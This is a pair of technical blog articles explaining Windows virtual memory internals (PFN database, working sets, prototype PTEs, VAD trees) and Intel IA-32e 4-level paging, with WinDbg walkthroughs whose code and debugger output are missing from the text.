Because we've switched into a user-mode context in one of our previous examples, WinDbg will require us to reload our symbols so that it can make sense of everything again. We can do that using the .reload /f command. Then we can look at notepad.exe's headers:


Again, the output is quite verbose, so the section information at the bottom is omitted from the above snippet. We're interested in the address of entry point member of the optional header, which is listed as 0x3acc. That value is called a relative virtual address (RVA), and it's the number of bytes from the base address of the notepad.exe image. If we add that relative address to the base of notepad.exe, we should see the code located at our entry point.


And we do see that the address resolves to notepad!WinMainCRTStartup, like we expected. Now we have the address of our target process' entry point: 00000000`ffd53acc.

While the above steps were a handy exercise in digging through parts of a loaded image, they weren't actually necessary since we had symbols loaded. We could have simply used the ? qualifier in combination with the symbol notepad!WinMainCRTStartup, as demonstrated below, or gotten the value of a handy pseudo-register that represents the entry point with r $exentry.


In any case, we now have the address of our entry point, which from here on we'll refer to as our β€œtarget” or the β€œtarget page”. We can now start taking a look at the different paging structures that support our target, as well as the PFN database entry for it.

Let's first take a look at the PFN database. We know the virtual address where this structure is supposed to start, but let's look for it the long way, anyway. We can easily find the beginning of this structure by using the ? qualifier and poi on the symbol name. The poi command treats its parameter as a pointer and retrieves the value located at that pointer.


Knowing that the PFN database begins at 0xfffffa80`00000000, we should be able to index easily to the entry that represents our target page. First we need to figure out the page frame number in physical memory that the target's PTE refers to, and then we can index into the PFN database by that number.

Looking back on what we learned from the previous article, we can grab the PTE information about the target page very easily using the handy !pte command.


The above result would indicate that the backing page frame number for the target is 0x65207b. That should be the index into the PFN database that we'll need to use. Remember that we'll need to multiply that index by the size of an nt!_MMPFN structure, since we're essentially trying to skip that many PFN entries.


This looks like a valid PFN entry. We can verify that we've done everything correctly by first doing the manual calculation to figure out what the address of the PFN entry should be, and then comparing it to where WinDbg thinks it should be.


So based on the above, we know that the nt!_MMPFN entry for the page we're interested in it should be located at 0xfffffa80`12f61710, and we can use a nice shortcut to verify if we're correct. As always in WinDbg, there is an easier way to obtain information from the PFN database. This can be done by using the !pfn command with the page frame number.


Here we can see that WinDbg also indicates that the PFN entry is at 0xfffffa8012f61710, just like our calculation, so it looks like we did that correctly.

An interlude about working sets

Phew - we've done some digging around in the PFN database now, and we've seen how each entry in that database stores some information about the physical page itself. Let's take a step back for a moment, back into the world of virtual memory, and talk about working sets.

Each process has what's called a working set, which represents all of the process' virtual memory that is subject to paging and is accessible without incurring a page fault. Some parts of the process' memory may be paged to disk in order to free up RAM, or in a transition state, and therefore accessing those regions of memory will generate a page fault within that process. In layman's terms, a page fault is essentially the architecture indicating that it can't access the specified virtual memory, because the PTEs needed for translation weren't found inside the paging structures, or because the permissions on the PTEs restrict what the application is attempting to do. When a page fault occurs, the page fault handler must resolve it by adding the page back into the process' working set (meaning it also gets added back into the process' paging structures), mapping the page back into memory from disk and then adding it back to the working set, or indicating that the page being accessed is invalid.

Figure 7: An example working set of a process, where some rarely accessed pages were paged out to disk to free up physical memory.

It should be noted that other regions of virtual memory may be accessible to the process which do not appear in the working set, such as Address Windowing Extensions (AWE) mappings or large pages; however, for the purposes of this article we will be focusing on memory that is part of the working set.

Occasionally, Windows will trim the working set of a process in response to (or to avoid) memory pressure on the system, ensuring there is memory available for other processes.

If the working set of a process is trimmed, the pages being trimmed have their backing PTEs marked as β€œnot valid” and are put into a transition state while they await being paged to disk or given away to another process. In the case of a β€œsoft” page fault, the page described by the PTE is actually still resident in physical memory, and the page fault handler can simply mark the PTE as valid again and resolve the fault efficiently. Otherwise, in the case of a β€œhard” page fault, the page fault handler needs to fetch the contents of the page from the paging file on disk before marking the PTE as valid again. If this kind of fault occurs, the page fault handler will likely also have to alter the page frame number that the PTE refers to, since the page isn't likely to be loaded back into the same location in physical memory that it previously resided in.

Sharing is caring

It's important to remember that while two processes do have different paging structures that map their virtual memory to different parts of physical memory, there can be portions of their virtual memory which map to the same physical memory. This concept is called shared memory, and it's actually quite common within Windows. In fact, even in our previous example with notepad.exe's entry point, the page of memory we looked at was shared. Examples of regions in memory that are shared are system modules, shared libraries, and files that are mapped into memory with CreateFileMapping() and MapViewOfFile().

In addition, the kernel-mode portion of a process' memory will also point to the same shared physical memory as other processes, because a shared view of the kernel is typically mapped into every process. Despite the fact that a view of the kernel is mapped into their memory, user-mode applications will not be able to access pages of kernel-mode memory as Windows sets the UserSupervisor bit in the kernel-mode PTEs. The hardware uses this bit to enforce ring0-only access to those pages.

Figure 8: Two processes may have different views of their user space virtual memory, but they get a shared view of the kernel space virtual memory.

In the case of memory that is not shared between processes, the PFN database entry for that page of memory will point to the appropriate PTE in the process that owns that memory.

Figure 9: When not sharing memory, each process will have PTE for a given page, and that PTE will point to a unique member of the PFN database.

When dealing with memory that is shareable, Windows creates a kind of global PTE - known as a prototype PTE - for each page of the shared memory. This prototype always represents the real state of the physical memory for the shared page. If marked as Valid, this prototype PTE can act as a hardware PTE just as in any other case. If marked as Not Valid, the prototype will indicate to the page fault handler that the memory needs to be paged back in from disk. When a prototype PTE exists for a given page of memory, the PFN database entry for that page will always point to the prototype PTE.

Figure 10: Even though both processes still have a valid PTE pointing to their shared memory, Windows has created a prototype PTE which points to the PFN entry, and the PFN entry now points to the prototype PTE instead of a specific process.

Why would Windows create this special PTE for shared memory? Well, imagine for a moment that in one of the processes, the PTE that describes a shared memory location is stripped out of the process' working set. If the process then tries to access that memory, the page fault handler sees that the PTE has been marked as Not Valid, but it has no idea whether that shared page is still resident in physical memory or not.

For this, it uses the prototype PTE. When the PTE for the shared page within the process is marked as Not Valid, the Prototype bit is also set and the page frame number is set to the location of the prototype PTE for that page.

Figure 11: One of the processes no longer has a valid PTE for the shared memory, so Windows instead uses the prototype PTE to ascertain the true state of the physical page.

This way, the page fault handler is able to examine the prototype PTE to see if the physical page is still valid and resident or not. If it is still resident, then the page fault handler can simply mark the process' version of the PTE as valid again, resolving the soft fault. If the prototype PTE indicates it is Not Valid, then the page fault handler must fetch the page from disk.

We can continue our adventures in WinDbg to explore this further, as it can be a tricky concept. Based on what we know about shared memory, that should mean that the PTE referenced by the PFN entry for the entry point of notepad.exe is a prototype PTE. We can already see that it's a different address (0xfffff8a0`09e25a00) than the PTE that we were expecting from the !pte command (0xfffff680007fea98). Let's look at the fully expanded nt!_MMPTE structure that's being referenced in the PFN entry.


We can compare that with the nt!_MMPTE entry that was referenced when we did the !pte command on notepad.exe's entry point.


It looks like the Prototype bit is not set on either of them, and they're both valid. This makes perfect sense. The shared page still belongs to notepad.exe's working set, so the PTE in the process' paging structures is still valid; however, the operating system has proactively allocated a prototype PTE for it because the memory may be shared at some point and the state of the page will need to be tracked with the prototype PTE. The notepad.exe paging structures also point to a valid hardware PTE, just not the same one as the PFN database entry.

The same isn't true for a region of memory that can't be shared. For example, if we choose another memory location that was allocated as MEM_PRIVATE, we will not see the same results. We can use the !vad command to give us all of the virtual address regions (listed by virtual page frame) that are mapped by the current process.


We can take a look at a MEM_PRIVATE page, such as 0x1cf0, and see if the PTE from the process' paging structures matches the PTE from the PFN database.


As we can see, it does match, with both addresses referring to 0xfffff680`0000e780. Because this memory is not shareable, the process' paging structures are able to manage the hardware PTE directly. In the case of shareable pages allocated with MEM_MAPPED, though, the PFN database maintains its own copy of the PTE.

It's worth exploring different regions of memory this way, just to see how the paging structures and PFN entries are set up in different cases. As mentioned above, the VAD tree is another important consideration when dealing with user-mode memory as in many cases, it will actually be a VAD node which indicates where the prototype PTE for a given shared memory region resides. In these cases, the page fault handler will need to refer to the process' VAD tree and walk the tree until it finds the node responsible for the shared memory region.

Figure 12: If the invalid PTE points to the process' VAD tree, a VAD walk must be performed to locate the appropriate _MMVAD node that represents the given virtual memory.

The FirstPrototypePte member of the VAD node will indicate the starting virtual address of a region of memory that contains prototype PTEs for each shared page in the region. The list of prototype PTEs is terminated with the LastContiguousPte member of the VAD node. The page fault handler must then walk this list of prototype PTEs to find the PTE that backs the specific page that has faulted.

Figure 13: The FirstPrototypePte member of the VAD node points to a region of memory that has a contiguous block of prototype PTEs that represent shared memory within that virtual address range.

One more example to bring it all together

It would be helpful to walk through each of these scenarios with a program that we control, and that we can change, if needed. That's precisely what we're going to do with the memdemo project. You can follow along by compiling the application yourself, or you can simply take a look at the code snippets that will be posted throughout this example.

To start off, we'll load our memdemo.exe and then attach the kernel debugger. We then need to get a list of processes that are currently running on the system.


Let's quickly switch back to the application so that we can let it create our initial buffer. To do this, we're simply allocating some memory and then accessing it to make sure it's resident.


Upon running the code, we see that the application has created a buffer for us (in the current example) at 0x000001fe`151c0000. Your buffer may differ.

We should hop back into our debugger now and check out that memory address. As mentioned before, it's important to remember to switch back into the process context of memdemo.exe when we break back in with the debugger. We have no idea what context we could have been in when we interrupted execution, so it's important to always do this step.


When we wrote memdemo.exe, we could have used the __debugbreak() compiler intrinsic to avoid having to constantly switch back to our process' context. It would ensure that when the breakpoint was hit, we were already in the correct context. For the purposes of this article, though, it's best to practice swapping back into the correct process context, as during most live analysis we would not have the liberty of throwing int3 exceptions during the program's execution.

We can now check out the memory at 0x000001fe`151c0000 using the db command.


Looks like that was a success - we can even see the 0xff byte that we wrote to it. Let's have a look at the backing PTE for this page using the !pte command.


That's good news. It seems like the Valid (V) bit is set, which is what we expect. The memory is Writeable (W), as well, which makes sense based on our PAGE_READWRITE permissions. Let's look at the PFN database entry using !pfn for page 0xa1dd0.


We can see that the PFN entry points to the same PTE structure we were just looking at. We can go to the address of the PTE at 0xffffed00ff0a8e00 and cast it as an nt!_MMPTE.


We see that it's Valid, Dirty, Accessed, and Writeable, which are all things that we expect. The Accessed bit is set by the hardware when the page table entry is used for translation. If that bit is set, it means that at some point the memory has been accessed because the PTE was used as part of an address translation. Software can reset this value in order to track accesses to certain memory. Similarly, the Dirty bit shows that the memory has been written to, and is also set by the hardware. We see that it's set for us because we wrote our 0xff byte to the page.

Now let's let the application execute using the g command. We're going to let the program page out the memory that we were just looking at, using the following code:


Once that's complete, don't forget to switch back to the process context again. We need to do that every time we go back into the debugger! Now let's check out the PTE with the !pte command after the page has been supposedly trimmed from our working set.


We see now that the PTE is no longer valid, because the page has been trimmed from our working set; however, it has not been paged out of RAM yet. This means it is in a transition state, as shown by WinDbg. We can verify this for ourselves by looking at the actual PTE structure again.


In the _MMPTE_TRANSITION version of the structure, the Transition bit is set. So because the memory hasn't yet been paged out, if our program were to access that memory, it would cause a soft page fault that would then simply mark the PTE as valid again. If we examine the PFN entry with !pfn, we can see that the page is still resident in physical memory for now, and still points to our original PTE.


Now let's press g again and let the app continue. It'll create a shared section of memory for us. In order to do so, we need to create a file mapping and then map a view of that file into our process.


Let's take a look at the shared memory (at 0x000001fe`151d0000 in this example) using db. Don't forget to change back to our process context when you switch back into the debugger.


And look! There's the 0xff that we wrote to this memory region as well. We're going to follow the same steps that we did with the previous allocation, but first let's take a quick look at our process' VAD tree with the !vad command.


You can see the first allocation we did, starting at virtual page number 0x1fe151c0. It's a Private region that has the PAGE_READWRITE permissions applied to it. You can also see the shared section allocated at VPN 0x1fe151d0. It has the same permissions as the non-shared region; however, you can see that it's Mapped rather than Private.

Let's take a look at the PTE information that's backing our shared memory.


This region, too, is Valid and Writeable, just like we'd expect. Now let's take a look at the !pfn.


We see that the Share Count now actually shows us how many times the page has been shared, and the page also has the Shared property. In addition, we see that the PTE address referenced by the PFN entry is not the same as the PTE that we got from the !pte command. That's because the PFN database entry is referencing a prototype PTE, while the PTE within our process is acting as a hardware PTE because the memory is still valid and mapped in.

Let's take a look at the PTE structure that's in our process' paging structures, that was originally found with the !pte command.


We can see that it's Valid, so it will be used by the hardware for address translation. Let's see what we find when we take a look at the prototype PTE being referenced by the PFN entry.


This PTE is also valid, because it's representing the true state of the physical page. Something interesting to note, though, is that you can see that the Dirty bit is not set. Because this bit is only set by the hardware in the context of whatever process is doing the writing, you can theoretically use this bit to actually detect which process on a system wrote to a shared memory region.

Now let's run the app more and let it page out the shared memory using the same technique we used with the private memory. Here's what the code looks like:


Let's take a look at the memory with db now.


We see now that it's no longer visible in our process. If we do !pte on it, let's see what we get.


The PTE that's backing our page is no longer valid. We still get an indication of what the page permissions were, but the PTE now tells us to refer to the process' VAD tree in order to get access to the prototype PTE that contains the real state. If you recall from when we used the !vad command earlier in our example, the address of the VAD node for our shared memory is 0xffffa50d`d2313a20. Let's take a look at that memory location as an nt!_MMVAD structure.


The FirstPrototypePte member contains a pointer to a location in virtual memory that stores contiguous prototype PTEs for the region of memory represented by this VAD node. Since we only allocated (and subsequently paged out) one page, there's only one prototype PTE in this list. The LastContiguousPte member shows that our prototype PTE is both the first and last element in the list. Let's take a look at this prototype PTE as an nt!_MMPTE structure.


We can see that the prototype indicates that the memory is no longer valid. So what can we do to force this page back into memory? We access it, of course. Let's let the app run one more step so that it can try to access this memory again.


Remember to switch back into the context of the process after the application has executed the next step, and then take a look at the PTE from the PFN entry again.


Looks like it's back, just like we expected!

Exhausted yet? Compared to the 64-bit paging scheme we talked about in our last article, Windows memory management is significantly more complex and involves a lot of moving parts. But at it's core, it's not too daunting. Hopefully, now with a much stronger grasp of how things work under the hood, we can put our memory management knowledge to use in something practical in a future article.

If you're interested in getting your hands on the code used in this article, you can check it out on GitHub and experiment on your own with it.


Further reading and attributions

Consider picking up a copy of "Windows Internals, 7th Edition" or "What Makes It Page?" to get an even deeper dive on the Windows virtual memory manager.Β 

Thank you to Alex Ionescu for additional tips and clarification. Thanks to irqlnotdispatchlevel for pointing out an address miscalculation.

Introduction to IA-32e hardware paging

8 July 2017 at 02:51
In this article, we explore the complexities and concepts behind Intel's 64-bit paging scheme, why we need paging in the first place, and some practical analysis of paging structures.

Why do we need paging?

In any application, whether it's a student's first program or a complicated operating system, instructions executed by the computer that involve memory use a virtual address. In fact, even when the CPU fetches the next instruction to execute, it uses a virtual address. A virtual address represents a specific location in the application's view of memory; however, it does not represent a location within physical RAM. Paging, or linear address translation, is the mechanism that converts a linear address accessible by the CPU to a physical address that the memory management unit (MMU) can use to access physical memory.

Technically, a linear address and a virtual address are not the same. For the purposes of this article, though, we will consider them to be the same, since we do not need to consider segmentation. Older architectures would first need to convert a virtual address to a linear address using segmentation.



Figure 1: An application with different parts of virtual memory mapping to different parts of physical memory.

Paging modes

In this article, we will focus on IA-32e 4-level paging (64-bit paging) on Intel architectures. It is worth noting, though, that there are other paging modes supported by Intel.

There are three mechanisms which control paging and the currently enabled paging mode. The first is the PG flag (bit 31) in control register 0 (CR0). If this bit is set, paging is enabled on the processor. If this bit is not set, no paging is enabled. In the latter case, the virtual address and physical address are considered equivalent and no translation is necessary.

If paging is enabled on the processor, then control register 4 (CR4) is checked for the Physical Address Extension (PAE) bit (bit 5) being set. If it is not, then 32-bit paging is used. If it is set, then the final condition that is checked is the Extended Feature Enable Register, or IA32_EFER MSR. If the Long Mode Enable (LME) bit (bit 8) of this register is not set, the processor is in PAE 36-bit paging mode. If the LME bit is set, the processor is in 4-level paging mode, which is the 64-bit mode that we plan to explore in this article. This mode translates 48-bit virtual addresses into 52-bit physical addresses, though because the virtual addresses are limited to 48-bits, the maximum addressable space is limited to 256TB.

Paging structures

Regardless of which paging mode is enabled, a series of paging structures are used to facilitate the translation from a virtual address to a physical address. The format and depth of these paging structures will depend on the paging mode chosen. Generally speaking, each entry in the paging structure is the size of a pointer and contains a series of control bits, as well as a page frame number.

In our case, 64-bit mode structures are 4,096 bytes in size (the size of the smallest architecture page - we will touch more on that later), containing 512 entries each. Every entry is 8 bytes.



Figure 2: A paging structure containing 512 pointer-size entries in 64-bit mode.

The first paging structure is always located at the physical address specified in control register 3 (CR3). As an aside, this is also the only place that stores the fully qualified physical address to a paging structure - in all other cases, we need to multiply a page frame number by the size of a page to get the real physical address. Each entry within the paging structure will contain a page frame number which either references a child paging structure for that region of memory, or maps directly to a page of physical memory that the original virtual address translates to. Again, in both cases, the page frame number is simply an index of a physical page in memory, and needs to be multiplied by the size of a page to get a meaningful physical address. Each paging structure entry also describes the the different memory access protections that are applied to the memory region they describe - whether the code is writable, executable, etc - as well as some more interesting properties such as whether or not that specific structure has previously been used for a translation.

While the nested paging structures are being walked, the translation can be considered complete either by identifying a page frame at the lowest level of paging structure or by an early termination caused by the configuration of a paging structure. For example, if a paging structure is marked as not present (bit 0 of the structure is not set) or if a reserved bit is set, the translation fails and the virtual address is considered invalid. Additionally, a paging structure can set its Page Size bit to indicate that it is the lowest paging structure for that region of memory, which we will touch more on later.



Figure 3: Some paging structures may not map to a physical page because the virtual address range they represent is invalid.

Anatomy of a virtual address

Information is encoded in a virtual address that makes the translation to a physical address possible. In 64-bit mode, we use 4-level paging, which means that any given virtual address can be divided into 6 sections with 4 of them associated with the different paging structures.

The different paging structures are as follows: a PML4 table (located in CR3), a Page Directory Pointer Table (PDPT), a Page Directory (PD), and a Page Table (PT). The figure below illustrates which bits of a given virtual address map to these different paging structures.

A single entry in the PML4 table (a PML4E) can address up to 512GB of memory, while an entry in the PDPT (a PDPTE) can address 1GB (parent granularity divided by 512) of memory, and so on. This is how we get the granularity of the paging structures down to 4KB at the lowest level.



Figure 4: The anatomy of a virtual address in 64-bit mode.

In the example above, we see that the highest bits (bits 63-48) are reserved. We will talk more about these bits in a future article, but for the purposes of address translation they are not used.

The next 9 bits (bits 47-39) are used to identify the index into the PML4 table that contains the entry (PML4E) that's next in our paging structure walk. For example, if these 9 bits evaluate to the number 16, then the 16th entry in the table (PML4[15]) is selected to be used for the address translation.

Once we have the PML4E entry from the given index, we can use that entry to provide us the address of the start of the next paging structure to walk to. Here is an example of what a PML4E structure would look like in C++.


Using the page frame number (PFN) member of the structure (in this case, it actually refers to the page frame where the next structure is located), we can now walk to the next structure in the hierarchy by multiplying that number by the size of a page (0x1000). The result of that multiplication is the physical address where the next paging structure is located. The PML4E points to a Page Directory Pointer Table (PDPT). We use the next 9 bits of our original virtual address (bits 38-30) to determine the index in the PDPT that we want to look at. At that index, we will find a PDPTE structure, like the one defined below.


It's worth noting at this point that paging structures other than those in the PML4 table contain a Page Size (PS) bit (bit 7). If this bit is set, then the current entry represents the physical page. This means that page sizes as large as 1GB can be supported, if the associated PDPTE indicates that it is a 1GB page by setting the PS bit. Otherwise, 2MB pages can be supported if the PS bit is set in the PDE structure. Not all processors support the PS bit being set in a PDPTE; therefore, not all processors will support 1GB pages.

Moving along in our example, we can assume that the PS bit is not set in the PDPTE that we just referenced. So, we will look at the page frame number of this structure and multiply by the page size again to get the physical address of the next paging structure root.



Figure 5: Our walk so far, from the CR3 register, through the PML4 and PDPT structures.

Using the PFN stored in the PDPTE structure, we're able to locate the Page Directory paging structure, which is next in the hierarchy. As before, we use the next 9 bits (bits 29-21) of the original virtual address to get the index into this structure where our entry of interest (a PDE, in this case) resides. The PDE structure is defined similarly to the previous structures, as shown below.


Again, we can use the PFN member of this structure multiplied by the size of a page to locate the next, and final, paging structure that facilitates the translation - the Page Table. The next 9 bits (bits 20-12) of our original virtual address are the index into the Page Table where the associated entry (PTE) is located. This PTE structure is defined below, and once again has similar characteristics to its predecessors.


The PFN member of this structure indicates the real page frame of the backing physical memory. Because our example went the full depth of the paging structures, the size of a page frame is 4KB, or 0x1000. Thus, in order to get the location in physical memory where the backing page begins, we multiply the page frame number from the PTE by 0x1000 as we had been doing previously. The remaining 12 bits (bits 11-0) of the original virtual address are the offset into the physical page where the actual data resides. Had our example not used the full depth of the paging structures, and had instead used 2MB page sizes (stopping at the Page Directory level), that PDE would have contained the page frame number of interest, and we would have multiplied that number by the size of a page frame, which in that case would be 2MB or 0x20000. We would then add the offset into the page, which would be the remaining bits (bits 20-0) of the original virtual address since we did not need to use the usual 9 bits for indexing into a Page Table structure.



Figure 6: Here we have a full traversal of the paging structures from CR3 all the way to the final PTE. We use the PFN from the PTE to calculate the backing physical page.

Practical exploration with WinDbg

We can use WinDbg to explore what this structure hierarchy looks like in practice. Windows does some things differently (such as per-process CR3 to keep the virtual address spaces of processes separate) and there are certain complexities that we will cover in a future article, but we will choose a simple example that demonstrates what we've just learned.Β 

Attach an instance of WinDbg as a kernel debugger to the virtual machine or physical box of your choice to get started. Check out this article for instructions on how to do so.

Once we've broken in, use the lm command to list the modules that have been loaded by the current process.


We'll use the image base of ntdll.dll as our example. It's located at 0x00000000`771d0000. We can view the memory at that virtual address by using db (or dX, where X is your desired format specifier).


Here we can see the signature 'MZ' as we would expect from a DOS header. But where are these bytes located in physical memory? There are two ways we can find out.

The first way is the hard way - we can get the value stored in CR3 which gives us the beginning of our PML4 paging structure, and begin our manual walk like we described above.


This means that the start of our PML4 table is located at physical address 0x187000. We can take a look at the physical memory at that location using !dq (or !dX, again where X is the format specifier you want to use). We're aligning on a quad-word because the size of each entry in any paging structure in 64-bit mode is 8 bytes.


Here we see that we have one PML4E structure, with 0x00700007`ddc82867 as the value. For a paging structure entry, we know that bits 47-12 represent the page frame number of the next paging structure. So we extract those bits to get 0x7ddc82, then multiply it by the size of a page frame on this architecture (4KB) to get a physical address of 0x00000007`ddc82000.

If we navigate to that physical address, let's see what we get.


Sure enough, there are two PDPTE entries (or potentially more, off-screen, since there can be up to 512 listed) here in this PDPT that we've walked to. In order to figure out which PDPTE we need to reference, we'd need to refer to the 9 bits in the original virtual address that map to the PDPT (bits 39-30), which in the case of our example works out to 0x1. That means we want the second entry of the PDPT structure, at index 1.

We can extract the page frame number from that PDPTE entry using the same bits we used in the last example (bits 47-12), resulting in 0x7d96b8. Let's multiply that number by 4KB, and see what we've got at that physical address.

You may be wondering at this point: what's going on? Why is there nothing in the PD structure that was referenced by our PDPTE? Remember, not all memory is valid and mapped, so the fact that we are seeing a bunch of zero-value PDE entries isn't a surprise. It just means that those regions of virtual memory aren't currently mapped to a physical page. In order to get to the PDE we care about, we need to take the next 9 bits of the original virtual address as we did before, this time getting a value of 0x1b8 after extracting the bits. That will get us the index into the PD structure where our PDE of interest is located. We can navigate to that memory location now, remembering to multiply the index by the size of a paging structure entry, which is 8 bytes.

That gets us 0x67e00007`d96b9867 as our PDE value. Once again, we extract the bits that are relevant to the page frame number, and we come up with 0x7d96b9.

We can repeat the steps we've taken previously to multiply that page frame number by 4KB, add the PT index using the next 9 bits of the original virtual address (0x1d0 in this case), then navigate to the correct physical address.

We've gotten the value 0xe7d00007`d9cc0025 for our PTE entry. We're almost there! We just need to do the same steps we've been doing one more time - extract the PFN from that value (0x7d9cc0), multiply by the size of a page (0x1000), but this time, we need to add the page offset (bits 11-0) from our original virtual address to the result. This should get us to 0x00000007`d9cc0000 since our page offset in this example was actually zero. Let's look at the memory!



There's the header, just like we expected. That's a cumbersome amount of work, though, and we don't want to have to be doing that manually every time we try to translate an address. Luckily, there's an easier way.

WinDbg provides the !pte command to illustrate the entire walk down the paging structures and what each entry contains. It is important to note, though, that the addresses of the paging structures are converted to virtual addresses before being displayed, so they will look different from the physical addresses we extrapolated on our own, but they point to the same memory.


You can see that WinDbg gives us the address of the paging structure used, what it contained, and the page frame number for each. You can verify that the PFN on the PXE (PML4E) entry matches up with what we calculated, too. The most important part of all of this information is the PFN that's within the lowermost entry, the PTE. In our case it's 0x7d9cc0.

So, we can multiply that page frame number by 0x1000 to get 0x00000007`d9cc0000, and that should be the physical address of the DOS header of ntdll.dll! This checks out based on the manual calculations we did previously, but let's take a look again to make sure.


And there it is! We can test this by editing the DOS header in WinDbg and seeing if those changes are reflected on the physical page.


Let's check it out using the virtual address...


...and the physical address...


And there you have it! We now know how to successfully walk the IA-32e paging structures to convert a virtual address into a physical address.

❌
❌